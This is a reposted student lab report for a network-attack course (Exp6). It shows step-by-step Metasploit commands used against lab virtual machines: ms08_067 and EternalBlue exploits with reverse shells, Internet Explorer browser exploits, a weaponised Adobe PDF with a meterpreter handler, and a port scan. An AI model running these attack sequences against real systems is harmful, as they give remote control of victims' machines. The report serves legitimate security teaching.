码迷,mamicode.com
首页 > 其他好文 > 详细

2019-2020-2 20174310隋润起《网络对抗技术》Exp6 MSF基础应用

时间:2020-04-30 21:24:56      阅读:82      评论:0      收藏:0      [点我收藏+]

标签:配置参数   xpl   hosts   msf   img   模块   type   arc   攻击机   

一、实践内容

   本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

  1.1一个主动攻击实践,如ms08_067

  1.2 一个针对浏览器的攻击,如ms11_050

  1.3 一个针对客户端的攻击,如Adobe

  1.4 成功应用任何一个辅助模块

  以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的

二、实践过程

攻击机:

  • Kali:192.168.80.131

靶机:

  • WinXP:192.168.80.134

实验前准备:

检测两个虚拟机能否ping通

刚开始出现靶机能够ping攻击机,而攻击机不能ping靶机的情况

技术图片

在靶机中通过cmd命令关闭防火墙后,二者能够互相ping通

技术图片

 技术图片

2.1 一个主动攻击实践

2.1.1 ms08_067漏洞渗透攻击实践

攻击者试探靶机是否存在ms08_067这个漏洞

  • nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.80.134

技术图片

技术图片

 可以看到靶机确实存在这个漏洞

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

  • use exploit/windows/smb/ms08_067_netapi
  • set payload generic/shell_reverse_tcp //tcp反向回连
  • set LHOST 192.168.80.131 //Kali即攻击方ip
  • set LPORT 4310 //端口
  • set RHOST 192.168.80.134 //xp靶机ip(漏洞端口已经固定)
  • exploit //攻击

可以看到回连成功

技术图片

 通过一些cmd指令,搜寻靶机的信息

技术图片

 技术图片

2.1.2MS17_010漏洞渗透攻击实践

使用指令

  • nmap --script=vuln 192.168.80.134

看看靶机是否还有其他的漏洞可以实践。

技术图片

 发现还存在MS17_010这个漏洞

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

  • use exploit/windows/smb/ms17_010_eternalblue
  • set payload generic/shell_reverse_tcp //tcp反向回连
  • set LHOST 192.168.80.131 //Kali即攻击方ip
  • set LPORT 4310 //端口
  • set RHOST 192.168.80.134 //xp靶机ip(漏洞端口已经固定)
  • exploit //攻击

 发现回连失败

技术图片

用show targets命令发现这个漏洞只有win7能够使用

技术图片

 打开win7虚拟机,ipconfig观察IP地址

技术图片

 更改靶机ip地址为192.168.80.131,再次攻击(注意将靶机防火墙关闭)

技术图片

 回连成功

技术图片

并查看IP信息 

2.2针对浏览器的攻击

2.2.1ms10_018漏洞攻击

首先查看浏览器漏洞:

  • cd /usr/share/metasploit-framework/modules/exploits/windows/browser

输入 ls 即可看到很多漏洞代码,选择

  • ms10_018_ie_behaviors.rb

技术图片

 进入msf,输入

  • search ms10_018

寻找相关漏洞模块

 技术图片

依次输入以下指令:

  • use exploit/windows/browser/ms10_018_ie_behaviors 
  • set payload windows/meterpreter/reverse_tcp 
  • set LHOST 192.168.80.131 //Kali即攻击方ip
  • set SRVHOST 192.168.80.131 //设置服务器IP(攻击者IP)
  • exploit //攻击

 技术图片

 在靶机访问对应网址

技术图片

 查看会话,使用指令

  • sessions

技术图片

选择会话

  • sessions 2

并获得靶机的控制权,查看靶机ip信息

 技术图片

 命令并不能识别,换一个漏洞 ms10_046再次尝试,过程与上面类似

 技术图片

 生成成功,再次访问

技术图片

 再次通过session1进行攻击

技术图片

 这次成功了

技术图片

2.3 针对客户端的攻击——Adobe攻击

启动msf 输入search adobe查询针对adobe攻击模块

 技术图片

使用

  • use windows/fileformat/adobe_cooltype_sing

设置payloads

依次输入下列指令

  • set payload windows/meterpreter/bind_tcp
  • set RHOST 192.168.80.134 //靶机ip
  • set LPORT 4310 //攻击端口
  • exploit//生成pdf

 技术图片

 生成pdf成功,cp复制到根目录

技术图片

复制到靶机并在靶机钟打开PDF。

在msf中,用如下指令进行监听

  • use exploit/multi/handler //进入监听模块
  • set payload windows/meterpreter/bind_tcp //选择攻击载荷
  • set RHOST 192.168.80.134//靶机IP
  • set LPORT 4310 //攻击端口
  • exploit

技术图片

获得权限,使用ipconfig指令进行验证

技术图片

 成功

3.4成功应用任何一个辅助模块

3.4.1scanner/portscan/tcp(唯一)

进入msf输入【show auxiliary】指令,查看可用的辅助模块。

技术图片

选择了

  • scanner/portscan/tcp

模块,该模块用来探测靶机的开放的tcp端口

依次输入指令

  • use scanner/portscan/tcp
  • set RHOSTS 192.168.80.134
  • exploit

便得到探测结果

技术图片

三、基础问题回答

4.1用自己的话解释什么是exploit,payload,encode

  • exploit就是漏洞的利用,如何利用漏洞,将我们制造的恶意代码传递过去,起到一个通道的作用。
  • payload就是一段恶意代码,在靶机的漏洞发挥作用,达到我们某种目的的代码,通过通道传输到靶机,发挥作用。
  • encode就是包装,将payload的代码进行改造,变得不那么容易被发现。

4.2离实战还缺些什么技术或步骤

  • 我们的实验与实际的生活还是有一定的差距,默认的将防火墙关闭,等等多种预设条件下进行的。要想与实战接轨,就要加强对信息的收集能力,在我们的实验中,实际上对靶机是了如指掌,而实战我们对靶机可能是一无所知,要从零开始对信息进行收集。其次我们的一些后门程序和网址,被攻击方方也不会乖乖的进行访问,我们需要对我们的攻击手段进行伪装,让对方在无意识的情况下被攻击,并且能够绕过一些防护软件的防御。

四、实践总结

这次实验是对于msf的一些简单应用,对于一些特定的漏洞,通过msf的一些工具在靶机上发挥作用。通过这次实验,我学会如何使用msf,遇到不会的就info查看详情,配置参数就是options查看,这样可以让我自己解决一些问题。同时也要加强英语的学习,这样大大的节省了查询单词的时间

2019-2020-2 20174310隋润起《网络对抗技术》Exp6 MSF基础应用

标签:配置参数   xpl   hosts   msf   img   模块   type   arc   攻击机   

原文地址:https://www.cnblogs.com/srq111/p/12811020.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!